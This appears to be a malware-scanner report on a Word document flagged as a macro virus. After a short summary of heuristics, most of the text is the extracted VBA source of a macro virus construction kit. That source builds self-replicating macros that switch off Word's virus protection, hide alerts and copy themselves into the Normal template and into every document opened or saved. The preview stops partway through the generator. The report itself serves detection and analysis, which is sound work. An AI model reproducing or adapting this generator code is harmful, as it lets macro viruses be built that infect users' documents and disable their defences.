MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file contains legacy WordBasic macro virus markers and AutoOpen/Auto_Close macros, indicating it is designed to execute malicious code when the document is opened. The presence of VBA macros and the ClamAV detection further support its malicious nature. The script appears to be a loader for a legacy macro virus.
Heuristics 6
-
ClamAV: Doc.Trojan.DWMVCK1-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.DWMVCK1-5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Print #1, " Options.VirusProtection = False" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Print #1, "'AutoClose macro" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41478 bytes |
SHA-256: e73ef0cb653cc6f8d08561f39e63bced5062412be64dc4326659bc7e839d4f88 |
|||
|
Detection
ClamAV:
Doc.Trojan.DWMVCK1-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "DW97MVCK"
Public VirusName As String
Public SourceFileName As String
Public NumberOfMacros As String
Sub AutoOpen()
On Error Resume Next
Application.Caption = "DarkChasm's Word 97 Macro Virus Construction Kit"
frmStartForm.Show
End Sub
Sub FileTemplates()
End Sub
Sub ToolsCustomize()
End Sub
Sub FileNew()
End Sub
Sub EditCut()
End Sub
Sub EditCopy()
End Sub
Sub EditPaste()
End Sub
Sub EditPasteSpecial()
End Sub
Sub EditClear()
End Sub
Sub EditSelectAll()
End Sub
Sub EditFind()
End Sub
Sub EditReplace()
End Sub
Sub EditGoTo()
End Sub
Sub ToolsOptions()
End Sub
Sub InsertObject()
End Sub
Sub InsertFile()
End Sub
Sub InsertHyperlink()
End Sub
Sub InsertCaption()
End Sub
Sub InsertFootNote()
End Sub
Sub InsertBreak()
End Sub
Sub TableSort()
End Sub
Sub TableFormula()
End Sub
Sub FilePrint()
End Sub
Sub FilePrintPreview()
End Sub
Sub FileVersions()
End Sub
Sub FileProperties()
End Sub
Sub ToolsWordCount()
End Sub
Sub ToolsMacro()
End Sub
Sub ViewVBCode()
End Sub
Attribute VB_Name = "frmStartForm"
Attribute VB_Base = "0{F0B82237-E726-11D0-A507-000000000000}{F0B8220F-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
frmStartForm.Hide
frmVirusSourceName.Show
End Sub
Attribute VB_Name = "frmVirusSourceName"
Attribute VB_Base = "0{F0B8223C-E726-11D0-A507-000000000000}{F0B82217-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
On Error GoTo DW97MVCK
If txtVirusName.Text = "" Then
MsgBox "Fill out the Virus Name text box.", vbOKOnly, "DW97MVCK"
txtboxnotfilled = 1
End If
If txtSourceFileName.Text = "" Then
MsgBox "Fill out the Source File Name text box.", vbOKOnly, "DW97MVCK"
txtboxnotfilled = 1
End If
If opttxt.Value = False And optBAS.Value = False Then
MsgBox "Choose if you want the output file to be a txt file or bas file.", vbOKOnly, "DW97MVCK"
txtboxnotfilled = 1
End If
If txtboxnotfilled = 1 Then GoTo DW97MVCK
If opttxt.Value = True Then
txtSourceFileName = txtSourceFileName & ".txt"
End If
If optBAS.Value = True Then
txtSourceFileName = txtSourceFileName & ".bas"
End If
VirusName = txtVirusName.Text
SourceFileName = txtSourceFileName.Text
frmVirusSourceName.Hide
frmVirusBody.Show
DW97MVCK:
End Sub
Attribute VB_Name = "frmVirusBody"
Attribute VB_Base = "0{F0B82240-E726-11D0-A507-000000000000}{F0B82219-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
On Error GoTo ByeBye
If chkbStealth.Value = True Then
frmStealth.Show
End If
If chkbRetro.Value = True Then
frmRetro.Show
End If
If chkbPolymorphic.Value = True Then
frmPolymorphic.Show
End If
If chkbPayload.Value = True Then
frmPayload.Show
End If
frmVirusBody.Hide
frmMacros.Show
ByeBye:
End Sub
Private Sub UserForm_Initialize()
On Error GoTo ByeBye
lblVirusName = VirusName
lblSourceFileName = SourceFileName
ByeBye:
End Sub
Attribute VB_Name = "frmStealth"
Attribute VB_Base = "0{F0B8224C-E726-11D0-A507-000000000000}{F0B8221B-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
frmStealth.Hide
End Sub
Attribute VB_Name = "frmRetro"
Attribute VB_Base = "0{F0B82250-E726-11D0-A507-000000000000}{F0B8221D-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
frmRetro.Hide
End Sub
Attribute VB_Name = "frmPolymorphic"
Attribute VB_Base = "0{F0B82254-E726-11D0-A507-000000000000}{F0B8221F-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
frmPolymorphic.Hide
End Sub
Attribute VB_Name = "frmPayload"
Attribute VB_Base = "0{F0B82244-E726-11D0-A507-000000000000}{F0B82221-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
On Error GoTo ByeBye
If chkbMessageBox.Value = True Then
frmPayloadMessageBox.Show
End If
If chkbPassword.Value = True Then
frmPayloadSetPassword.Show
End If
If chkbBeep.Value = True Then
frmPayloadBeep.Show
End If
If chkbExitWindows.Value = True Then
frmPayloadExitWindows.Show
End If
If chkbAssistant.Value = True Then
frmPayloadOfficeAssistant.Show
End If
If chkbCaption.Value = True Then
frmPayloadChangeCaption.Show
End If
If chkbChangeStatusBar.Value = True Then
frmPayloadChangeStatusBar.Show
End If
frmPayload.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadMessageBox"
Attribute VB_Base = "0{F0B82258-E726-11D0-A507-000000000000}{F0B82223-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
If txtMessageBoxTitle = "" Then GoTo ByeBye
If txtMessageBox = "" Then GoTo ByeBye
frmPayloadMessageBox.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadSetPassword"
Attribute VB_Base = "0{F0B8225C-E726-11D0-A507-000000000000}{F0B82225-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
If txtPassword = "" Then GoTo ByeBye
frmPayloadSetPassword.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadBeep"
Attribute VB_Base = "0{F0B82260-E726-11D0-A507-000000000000}{F0B82227-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
On Error Resume Next
If txtYear = "" Then
txtYear = "Now()"
End If
If txtYear < 1997 Then
txtYear = "1997"
End If
If txtYear > 3000 Then
txtYear = "3000"
End If
If txtDay = "" Then
txtDay = "Now()"
End If
If txtDay > 31 Then GoTo DW97MVCK
If txtDay < 1 Then GoTo DW97MVCK
If txtMonth = "" Then
txtMonth = "Now()"
End If
If txtMonth > 12 Then GoTo DW97MVCK
If txtMonth < 1 Then GoTo DW97MVCK
frmPayloadBeep.Hide
DW97MVCK:
End Sub
Private Sub SpinButton1_SpinDown()
If txtNumberOfBeeps = 1 Then GoTo DW97MVCK
txtNumberOfBeeps = txtNumberOfBeeps - 1
DW97MVCK:
End Sub
Private Sub SpinButton1_SpinUp()
txtNumberOfBeeps = txtNumberOfBeeps + 1
End Sub
Attribute VB_Name = "frmPayloadExitWindows"
Attribute VB_Base = "0{F0B82264-E726-11D0-A507-000000000000}{F0B82229-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
frmPayloadExitWindows.Hide
End Sub
Attribute VB_Name = "frmPayloadOfficeAssistant"
Attribute VB_Base = "0{F0B82268-E726-11D0-A507-000000000000}{F0B8222B-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
If txtHeading = "" Then GoTo ByeBye
If txtMessage = "" Then GoTo ByeBye
frmPayloadOfficeAssistant.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadChangeStatusBar"
Attribute VB_Base = "0{F0B8226C-E726-11D0-A507-000000000000}{F0B82233-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
If txtStatusBar = "" Then GoTo ByeBye
frmPayloadChangeStatusBar.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmPayloadChangeCaption"
Attribute VB_Base = "0{F0B82270-E726-11D0-A507-000000000000}{F0B8222D-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
If txtCaption = "" Then GoTo ByeBye
frmPayloadChangeCaption.Hide
ByeBye:
End Sub
Attribute VB_Name = "frmMacros"
Attribute VB_Base = "0{F0B82274-E726-11D0-A507-000000000000}{F0B8222F-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
On Error GoTo ByeBye
NumberOfMacros = 0
If chkbAutoOpen.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbAutoClose.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbFileSaveAs.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbFileSave.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbFilePrint.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbToolsWordCount.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbEditFind.Value = True Then
NumberOfMacros = NumberOfMacros + 1
End If
If chkbAutoOpen.Value = False And chkbAutoClose.Value = False And chkbFileSaveAs.Value = False And chkbFileSave.Value = False And chkbFilePrint.Value = False And chkbEditFind.Value = False And chkbToolsWordCount.Value = False Then
GoTo DW97MVCK
End If
frmMacros.Hide
frmMakeVirus.Show
GoTo ByeBye
DW97MVCK:
MsgBox "Pick a macro to use as the infection vector.", vbOKOnly, "DW97MVCK"
ByeBye:
End Sub
Attribute VB_Name = "frmMakeVirus"
Attribute VB_Base = "0{F0B82248-E726-11D0-A507-000000000000}{F0B82231-E726-11D0-A507-000000000000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdExit_Click()
On Error Resume Next
Tasks.ExitWindows
End Sub
Private Sub cmdMAKE_Click()
On Error GoTo ByeBye
Open SourceFileName For Output As #1
Print #1,
Print #1, "'Generated by DarkChasm's Word 97 Macro Virus Construction Kit (DW97MVCK)"
Print #1, "'Virus Name: " & VirusName
Print #1,
If frmMacros.chkbAutoOpen = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'AutoOpen macro"
Print #1, "'Executed when a document is opened"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub AutoOpen()"
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbAutoClose = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'AutoClose macro"
Print #1, "'Executed when a document is closed"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub AutoClose()"
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFileSaveAs = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'FileSaveAs macro"
Print #1, "'Executed when a user selects File SaveAs from the Word menu"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub FileSaveAs()"
Print #1,
Print #1, " Dialogs(wdDialogFileSaveAs).Show"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFileSave = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'FileSave macro"
Print #1, "'Executed when a user selects File Save from the Word menu"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub FileSave()"
Print #1,
Print #1, " ActiveDocument.Save"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFilePrint = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'FilePrint macro"
Print #1, "'Executed when a user selects File Print from the Word menu"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub FilePrint()"
Print #1,
Print #1, " Dialogs(wdDialogFilePrint).Show"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbEditFind = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'EditFind macro"
Print #1, "'Executed when a user selects Edit Find from the Word menu"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub EditFind()"
Print #1,
Print #1, " Dialogs(wdDialogEditFind).Show"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbToolsWordCount = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'ToolsWordCount macro"
Print #1, "'Executed when a user selects Tools WordCount"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub ToolsWordCount()"
Print #1,
